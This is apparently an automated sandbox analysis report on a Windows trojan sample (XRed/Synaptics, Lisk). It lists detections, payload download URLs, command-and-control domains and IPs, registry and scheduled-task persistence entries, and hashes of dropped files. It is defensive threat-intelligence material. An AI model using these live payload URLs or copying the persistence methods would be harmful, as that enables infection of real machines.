C:\ProgramData\Synaptics\Synaptics.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	53%	ReversingLabs	Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_VKKDXE.exe	53%	ReversingLabs	Win32.Trojan.Lisk

Source	Detection	Scanner	Label
http://xred.site50.net/syn/SSLLibrary.dl8	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/SUpdate.ini07	100%	Avira URL Cloud	malware
https://drive.)B	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	false	high
docs.google.com	172.217.18.110	true	false	high
drive.usercontent.google.com	142.250.185.193	true	false	high
xred.mooo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
xred.mooo.com	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://drive.usercontent.google.com/(	Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	Synaptics.exe.0.dr	false		high
https://docs.google.com/8	Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978j	Synaptics.exe, 00000006.00000002.1655867762.0000000005660000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/urity	Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/0	Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/&	Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Synaptics.exe, 00000006.00000002.1655867762.00000000056AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.28.dr	false		high
http://xred.site50.net/syn/Synaptics.rar	Synaptics.exe.0.dr	false		high
http://ip-score.com/checkip/	._cache_VKKDXE.exe, 00000003.00000002.2530624721.0000000001194000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/Q	Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini07	VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.google.com/	Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/google.com/	Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/GR	Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	Synaptics.exe.0.dr	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	Synaptics.exe.0.dr	false		high
http://xred.site50.net/syn/SSLLibrary.dl8	VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlL	VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/S	Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini	Synaptics.exe.0.dr	false		high
https://drive.)B	Synaptics.exe, 00000006.00000003.1394919128.0000000000609000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/O	Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978l	VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/VU	Synaptics.exe, 00000006.00000002.1650418516.0000000000578000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsO	Synaptics.exe, 00000006.00000002.1655867762.00000000056F9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/uc?id=0;	Synaptics.exe, 00000006.00000002.1674657710.000000000D4FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1681694810.000000001023E000.00000004.00000010.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll	Synaptics.exe.0.dr	false		high
https://docs.google.com/XO	Synaptics.exe, 00000006.00000003.1437230556.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.111.138.100	unknown	United States	3223	VOXILITYGB	true
172.217.18.110	docs.google.com	United States	15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582350
Start date and time:	2024-12-30 11:40:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VKKDXE.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@24/44@7/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 91 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 13.89.179.14, 52.182.143.212, 13.107.246.45, 20.190.159.73, 4.175.87.197
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, onedscolprdcus18.centralus.cloudapp.azure.com, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
Execution Graph export aborted for target Synaptics.exe, PID 7492 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:41:22	API Interceptor	196x Sleep call for process: Synaptics.exe modified
07:18:18	API Interceptor	2x Sleep call for process: WerFault.exe modified
07:19:48	API Interceptor	24x Sleep call for process: splwow64.exe modified
11:41:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CXNFQD "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
11:41:19	Task Scheduler	Run new task: CXNFQD.exe path: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
11:41:26	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:41:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CXNFQD "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
13:18:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CXNFQD.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.111.138.100	New PO - Supplier 16-12-2024-Pdf.exe	Get hash	malicious	XRed	Browse
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse
	test.msi	Get hash	malicious	LodaRAT	Browse
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse
	sdlvrr.msi	Get hash	malicious	LodaRAT	Browse
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse
	Machine-PO.exe	Get hash	malicious	XRed	Browse
69.42.215.252	New PO - Supplier 16-12-2024-Pdf.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	docx.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	hoaiuy.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	222.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
freedns.afraid.org	New PO - Supplier 16-12-2024-Pdf.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	docx.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	hoaiuy.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	222.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VOXILITYGB	New PO - Supplier 16-12-2024-Pdf.exe	Get hash	malicious	XRed	Browse	172.111.138.100
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	test.msi	Get hash	malicious	LodaRAT	Browse	172.111.138.100
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	sdlvrr.msi	Get hash	malicious	LodaRAT	Browse	172.111.138.100
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	Machine-PO.exe	Get hash	malicious	XRed	Browse	172.111.138.100
AWKNET-LLCUS	New PO - Supplier 16-12-2024-Pdf.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	docx.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	hoaiuy.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	222.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	New PO - Supplier 16-12-2024-Pdf.exe	Get hash	malicious	XRed	Browse	172.217.18.110 142.250.185.193
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.217.18.110 142.250.185.193
	Purchase-Order.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.217.18.110 142.250.185.193
	FGNEBI.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.217.18.110 142.250.185.193
	docx.msi	Get hash	malicious	XRed	Browse	172.217.18.110 142.250.185.193
	hoaiuy.msi	Get hash	malicious	XRed	Browse	172.217.18.110 142.250.185.193
	222.msi	Get hash	malicious	XRed	Browse	172.217.18.110 142.250.185.193
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.217.18.110 142.250.185.193
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.217.18.110 142.250.185.193
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.217.18.110 142.250.185.193

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_56f1e7e6dd49e686cdf4ffd820ded92baa13c65_455b7b6e_d4a9fcf6-d18d-48f4-991b-8548e68d9718\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1337097435960914
Encrypted:	false
SSDEEP:	192:H472v2Vps4Im10BU/3DzJDzqjLOA/Fcm2CzuiFRZ24IO8EKDzy:Jviy4sBU/3Jqjk6zuiFRY4IO8zy
MD5:	7084A2C5D71B4D4DB7EA419270855900
SHA1:	1D80D420696802A2B01EC48BF74E2725389DB377
SHA-256:	26ADE682D5C01660F89DC759FB4F72BB70952B0A4F028EFF6381523231624FC1
SHA-512:	74D101093746BAA26B066953D2DB86D043DBB01299173B84D3F6707C988A1223311FD5334E9C05D63607F1CA37BB3B53A80EB8121F174DBCEC70136BDB413F2E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.3.4.6.9.2.8.3.3.4.3.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.3.4.6.9.5.9.8.9.6.9.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.a.9.f.c.f.6.-.d.1.8.d.-.4.8.f.4.-.9.9.1.b.-.8.5.4.8.e.6.8.d.9.7.1.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.7.f.4.e.1.0.-.8.7.f.8.-.4.6.c.4.-.8.b.5.a.-.8.5.f.d.e.d.0.c.2.b.b.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.4.-.0.0.0.1.-.0.0.1.4.-.c.4.9.a.-.1.c.5.a.a.7.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.0.7.a.2.5.f.0.c.e.6.8.d.c.f.7.5.e.4.2.3.4.8.6.c.a.e.6.2.e.d.1.0.6.0.9.e.5.2.b.1.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_d6be89fd9263ead55c8d42f83d286de07578feeb_455b7b6e_ad93f567-4f8b-425b-be90-a480636c7c8d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1333576133569065
Encrypted:	false
SSDEEP:	192:S1u2v2VpsSImS0X8cPTDzJDzqjLOA/Fcm2CzuiF2Z24IO8EKDzy:8viySzX8cPTJqjk6zuiF2Y4IO8zy
MD5:	D28C31BF742E585A9CFCF80B98CB3100
SHA1:	003175D476E67F71DD9CA070D6B587DBE71FBA80
SHA-256:	B3E550C1685FCB01509CF2337EC83482E08C55A7024F5CA18B12BEF84C50B0C6
SHA-512:	03D0D57D6A381C35A67DDDB6C7A1CF3A524CEF7D97CF23668CD26B7808069FCFD024D25C02FD31C825E68320824A541905A36C3D90B9F327B5498B07257A9852
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.3.4.6.9.8.7.2.9.7.3.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.3.4.7.0.1.8.5.4.7.6.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.9.3.f.5.6.7.-.4.f.8.b.-.4.2.5.b.-.b.e.9.0.-.a.4.8.0.6.3.6.c.7.c.8.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.b.0.1.4.4.8.-.1.8.0.5.-.4.1.f.f.-.b.f.f.c.-.3.b.d.2.0.4.4.4.0.4.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.4.-.0.0.0.1.-.0.0.1.4.-.c.4.9.a.-.1.c.5.a.a.7.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.0.7.a.2.5.f.0.c.e.6.8.d.c.f.7.5.e.4.2.3.4.8.6.c.a.e.6.2.e.d.1.0.6.0.9.e.5.2.b.1.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2FE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 12:18:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1774742
Entropy (8bit):	2.2533099679851643
Encrypted:	false
SSDEEP:	12288:Mt2IaG9ONXQZOmQfHdmvU0Gm20aKhCY0YniRMSpqXSWhTBHCwCEc9KFV8+crQ2KM:Mt2IM/nDd
MD5:	3B15697D1EBC966613146972F562D03A
SHA1:	972F31AA28D822F4C2AB5E55AF2F5CF4A18ACE3B
SHA-256:	F8C44EBB2845E86F6C5B6CF1E3ECAC1902DF6F27666D879CE8E2580E0C8FF7F1
SHA-512:	FFA9AD7A27C9485C8DE6E93AE36F72EF65820163F5343A9693BC0BA6DF5E6B3899DB1D1410FB594F15ECA7CAA58CD64157E0B0DABC1082D078D6E809FEF81CDF
Malicious:	false
Preview:	MDMP..a..... .........rg.............%...............,......$...pL.......b..............`.......8...........T............................L...........N..............................................................................eJ.......O......GenuineIntel............T.......D....xrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE0B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6320
Entropy (8bit):	3.7208167041029236
Encrypted:	false
SSDEEP:	192:R6l7wVeJXxH6mYiStzprc89bgPOsfzifm:R6lXJx6mYFXwNfB
MD5:	D5E8AFFB04C27A799ACDE1CAC2A22F0A
SHA1:	2FA29F8CB1B034518EFD0E0FB3F2E6B6AE0464F9
SHA-256:	9DD1E8708AC12F6F3992D7BACE094E876B0273F15835FBDD7972563FFA9603C2
SHA-512:	E044080F2E0A16D621707D9BCA271BD4380721C7455847A4D2AA8E656A4AF2D6943874EFB24425102EC4794A7C2A0E4220C99BABB919E77BE8DF4C3F5FEDEF96
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE2B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4572
Entropy (8bit):	4.4435038763278545
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5Jg77aI9fEWpW8VYjYm8M4JFLFk+q84qH6ZhQd:uIjfLI7dd7VfJgMH6ZhQd
MD5:	852EF26131BB8B5BB3455F5A576FE4A6
SHA1:	D8A4604467B18257169A0A10DDE990C74385EF11
SHA-256:	137CBF1FEF5650440A60D98998AAE7D1C28E79F176B7149657AEFA7BD2AE241B
SHA-512:	D242CC7F118509CE2AA8CCBAB8F48A5F710ACEFFF69CCC977659E05C439D1EB20913D39B8EBA4435B18774AE3EB3F54D41A315056622E266576F826C3582BB9C
Malicious:	false
